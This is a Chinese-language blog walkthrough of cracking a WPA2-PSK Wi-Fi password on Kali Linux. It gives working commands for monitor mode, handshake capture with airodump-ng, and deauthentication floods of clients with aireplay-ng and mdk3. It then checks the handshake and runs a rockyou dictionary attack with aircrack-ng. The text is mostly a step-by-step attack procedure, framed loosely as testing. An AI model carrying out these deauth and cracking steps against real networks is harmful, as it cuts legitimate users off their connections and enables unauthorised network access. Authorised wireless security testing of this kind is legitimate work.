OS
kali 2020
网卡
usb Ralink Technology, Corp. RT2870/RT3070
工具
kismet airmon-ng airodump-ng aireplay-ng aircrack-ng mdk3 wifite bessid-ng-crawler…
爆破过程
将网卡设置为监听模式:
airmon-ng start wlan0
其他的设置方式:
ip link set wlan0 down //使用iwconfig配置时需要先停用网卡
iwconfig wlan0 mode monitor//
ip link set wlan0 up
ip link show wlan0//查看网卡状态
iwconfig wlan0//查看网卡运行模式
使用kismet嗅探网络环境:
新版kismet使用web客户端:
锁定目标,并查看关联客户端信息:
该工具是可以捕获到握手包,但这里使用airodump-ng工具来针对性捕获,确认AP MAC和客户端 MAC,使用airodump-ng抓包,在使用aireplay-ng或mdk3发起死亡认证攻击(deauth attack)
airodump-ng -w hscap --bssid x:x:x:x:x:x -c 1 wlan0mon
-w表示将数据包数据写入前缀为hscap的文件中 --bssid表示目标AP的MAC -c表示信道
aireplay-ng -0 100 -a x:x:x:x:x:x -c x:x:x:x:x:x wlan0mon
-0 100 表示死亡认证攻击100次
–deauth count : deauthenticate 1 or all stations (-0)
-a 表示目标AP MAC -c表示客户端(受害客户端)MAC
或者
mdk3 wlan0mon d -b BSSID_3002.txt -c 1
d表示deauth attack攻击模式,-b表示黑名单MAC,即需要测试MAC列表文件 -c表示信道
实际测试的时候网卡侦听信道一直在跳,所以使用aireplay-ng时多试了几次,正好在目标信道的时候成功发起了攻击,否者会提示网卡工作信道和目标AP信道不一致的错误。而mdk3的输出不明确,所以按aireplay-ng的攻击结果算。
pwr为0时表示客户端与AP断开连接,说明攻击成功。
最后测试了几次都没有抓到完整的握手包,而仅抓到了1/4的握手包数据(完整的握手过程有四个数据包)
以下为检验握手包过程:
besside-ng-crawler ./ outfile
表示检索单当前目录的数据包,并将握手包合并到一个数据包文件outfile中
wifite --check outfile
表示检查数据包中是否包含完整的握手包,到此测试结果为不完整
wireshark outfile
使用wireshark打开数据包查看,并过滤握手包:
可见只捕获到了1/4的握手包。
重复上述抓包过程,最后抓到完整的握手包:
aircrack-ng -a 2 -e xxx -l key.txt -w /usr/share/wordlists/rockyou.txt pacpfile.cap
-a 2 表示wpa暴力破解模式 -e 表示essid -l 表示保存的密钥文件 -w 表示字典 *.cap表示包含握手包的数据文件
显然一个好的字典很重要!!!
再拿到密码后,加入字典,重新跑一次:
总结
关键的还是字典呢。
本例的加密模式为WPA2-PSK,其认证流程如下:
1.AP定期广播Beacon帧
2.客户端在各个信道广播Probe Request请求
3.各个信道上的AP响应Probe Response
4.客户端向AP发送AUTH包
5.AP回应网卡AUTH包
6.客户端请求关联Association Request
7.AP响应Association Response
8.EAPOL四次握手
5811
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
